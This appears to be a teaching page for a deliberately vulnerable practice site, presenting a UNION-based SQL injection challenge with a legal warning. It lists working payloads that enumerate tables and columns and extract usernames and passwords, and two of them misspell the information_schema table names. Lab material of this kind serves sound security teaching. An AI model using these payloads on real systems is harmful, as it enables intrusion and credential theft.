☠️

UNION-Based SQL Injection Challenge 🐱‍🐉

This page demonstrates a series of UNION-based SQL injection examples. Each query below is intentionally unsafe—use them in the search box (at right) if you want to see how a vulnerable system behaves.

WARNING: In many countries (including UK) it is illegal to use this attack.

Up to 6 months in jail for unauthorised access

I've set up a vulnerable test system here so that you can have a go.

I promise not to prosecute.

The challenge on this page is to discover the usernames and passwords of all this website's registered users.
You will need to find the name of the table storing this information, then the names of the columns in this table.
You will then be able to use a UNION query to return all the user information held in the database.

Try These UNION Attacks:

Simple union injection:
mouse' UNION SELECT 1,2,3,4,5 #

Check if DB is MySQL (using IF() function):
mouse' UNION SELECT 1, CASE WHEN 1=1 THEN 'MySQL' ELSE 'NotMySQL' END, 3, 4, 5 --

Extract table names (from information_schema.tables):
mouse' UNION SELECT 1, table_name, 3, 4, 5 FROM information_schema_tables --

Extract column names from a known table (e.g. users):
mouse' UNION SELECT 1, column_name, 3, 4, 5 FROM information_schema_columns WHERE table_name = 'users' --

Select data from a known table:
mouse' UNION SELECT 1, username, password, 4, 5 FROM users --

☠️

Vulnerable Product Search

UNION-Based SQL Injection Challenge 🐱‍🐉

Try These UNION Attacks: